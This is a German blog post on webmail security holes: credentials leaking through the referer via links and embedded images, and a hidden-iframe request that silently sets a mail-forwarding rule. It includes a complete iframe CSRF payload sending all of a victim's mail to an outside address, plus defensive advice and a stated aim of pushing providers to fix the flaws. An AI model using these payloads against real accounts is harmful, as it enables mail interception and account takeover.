Sicherheitslücken bei Web based Mail Providern

Sicherheitslücken bei Web based Mail Providern
Eigentlich sollte es Sie gar nicht mehr geben – Die altbekannten Sicherheitslücken bei Mail Providern… doch, manche Mail Provider scheinen sehr naiv zu sein oder die Tricks und Kniffe um an E-Mails nicht zu kommen.

Eigentlich sollte es Sie gar nicht mehr geben – Die altbekannten
Sicherheitslücken bei Mail Providern… doch, manche Mail Provider
scheinen sehr naiv zu sein oder die Tricks und Kniffe um an E-Mails
nicht zu kommen. In diesem Artikel möchte Ich die (wahrscheinlich)
bereits bekannten Sicherheitslücken aufzeigen die manche E-Mail
Provider anscheinend immernoch nicht kennen.

Methode 1: Refer-Link
Durch das setzen eines Links auf ein CGI Skript (oder anderes Serverseitiges
Skript) in einer Mail, kann der sogenannte HTTP_REFERER gespeichert
werden, dieser gibt die zuletzt besuchte Webseite an. An sich ist
dies gut für Statistiken, doch bei E-Mail Providern birgt es
ein Problem: wenn von (zum Beispiel) der URL:

http://www.gmx.de/mail.cgi?user=3781895&pass=geheim

Ein Programm gelinkt wird das eben diese URL speichert gibt der
User dadurch seine Zugangsdaten bekannt. GMX wurde hier nur als
Beispiel gewählt, GMX hat diese Sicherheitslücke nicht.

Abhilfe wird durch einen einfachen Derefer geschaffen:
Anstatt die URL http://www.xyz.de/mail.cgi direkt aufzurufen wird
http://www.gmx.de/derefer.cgi?http://www.xyz.de aufgerufen
– Dadurch wird der mail.cgi als Referer das Derefer Skript gegeben.

Eine weitere Möglichkeit zur Abhilfe ist das verschlüsselte
Angeben der Zugangsdaten, das verschicken der Daten via POST Methode
oder auch das Setzen eines Cookies.

Methode 1 – Etwas Verändert: Image Referer
Manche E-Mail Provider lassen selbst bei Web Based E-Mail ganz normale
HTML Mails zu – Das Problem ist dabei genauso wie beim Refer Link,
nur das diese Methode auch zieht wenn kein Link aufgerufen wird
und weniger bekannt ist (bis vor einiger Zeit sogar noch bei web.de
möglich gewesen).

Ein Beispiel: <img src=http://xyz.de/mail.cgi>

Wieder lässt sich damit der Komplette Referer auslesen, und
die Abhilfe wäre die gleiche wie oben. Das selbe Problem besteht
allerdings nicht nur bei Links & Bildern sondern bei vielen
von fremden URLs angeforderten Daten bei denen der Referer mitgesandt
wird (Frames, Iframes, …).

Methode 2 – IFrames
Diese Methode scheint, obwohl Sie denkbar einfach ist, manchen Mail
Providern immernoch nicht bekannt zu sein – Durch das Setzen von
IFrames lassen sich URLs aufrufen (tatsächlich…)!

Wenn nun das E-Mail System nicht weiter abgesichert ist (zb. AllMail),
so ist es recht einfach möglich fiese Sachen mit dem jeweiligen
Account anzustellen.

Beispiel:

<iframe src=http://freemail.AllMail.de/servlets/AllMail?
inputCondition=Alle+eMails&inputText=
&Destination=eMail+weiterleiten&selectFolder=Entwurf
&inputMailTo=you@mail.com&inputPriority=5
&Function=MailFilter_Update&Language=de&Number=1
&Modul=IFMConfig width=1 height=1>

Sendet man diesen Code an eine Adresse bei AllMail und wird die
jeweilige Mail aufgerufen werden automatisch alle weiteren eingehenden
mails an "you@mail.com" geleitet. Je nach Mailprovider
ist es hier allerdings sogar möglich das Passwort zu ändern
oder den Account abzumelden.

General-Abhilfe
Es ist sicherlich nicht so das dies Hilfe gegen alle noch kommenden
Sicherheitslücken bei Web Based E-Mail Providern leistet, aber
eine recht einfache und dennoch effektive Abhilfe ist die wie sie
auch von GMX verwendet wird: Die HTML Mails werden zuerst als pur
Text Mails angezeigt (oder es werden nur die "positiven"
HTML Tags, also zb. Formatierungen herausgefiltert) und dann wird
der User gefragt ob er ggf. durch einen Derefer die gesamte E-Mail
anzeigen möchte; Dadurch ist zwar der User nicht vor ‘lustigen’
Dingen wie ein Zugriff auf c:\con\con geschützt, dafür
ist ihm allerdings wenigstens sein E-Mail Account sicher.

Ein Tipp noch zum herausfiltern: Filtern Sie bitte nicht mit einer
Negativ Liste (also zb. img, href, etc.) sondern mit einer Positiv
Liste (b,center, etc.), dadurch können auch neue Sicherheitslücken
meist nicht greifen.

Sinn dieses Artikels
Dieser Artikel soll keineswegs dazu dienen Möchtegern Hackern
den Zugriff auf E-Mail Konten zu geben, sondern die WBE Provider
dazu anspornen Ihre Systeme zu verbessern.

Prävention beim User
Falls Sie selber nicht Opfer eines WBE Angriffes werden möchten
sollten Sie Ihre E-Mails bei einem möglichst großen Provider
hosten oder via POP3 abrufen – Dies bietet auch keine hunderprozentige
Sicherheit aber zumindest deutlich mehr. Desweiteren sollte man
erst zweimal nachdenken ob man lieber eine Adresse die auf @AllMail.de
o.ä. endet oder lieber keine Mitleser bei seinen E-Mails hat.

Letzte Worte
Im Beispiel wurde AllMail.de Freemail verwendet (Info: Aus Sicherheitsgründen
wurde der wirkliche Name des Anbieters in "AllMail" geändert,
der genannte Anbieter existiert unter anderem Namen) – Man soll
jetzt bitte nicht denken es wäre nur dieser kleine Provider
der solch dumme Lücken in seinem System hat, desweiteren stammt
das Mailsystem bei AllMail Freemail wohl nicht aus eigener Feder,
sondern von der Firma CanBox die u.a. große Firmen wie Coca
Cola, Pro Sieben Digital Media GmbH, die Tomorrow Internet AG uvm.
zu Ihren Kunden zählt.

This entry was posted in Projektpflege. Bookmark the permalink.

Leave a Reply

Your email address will not be published. Required fields are marked *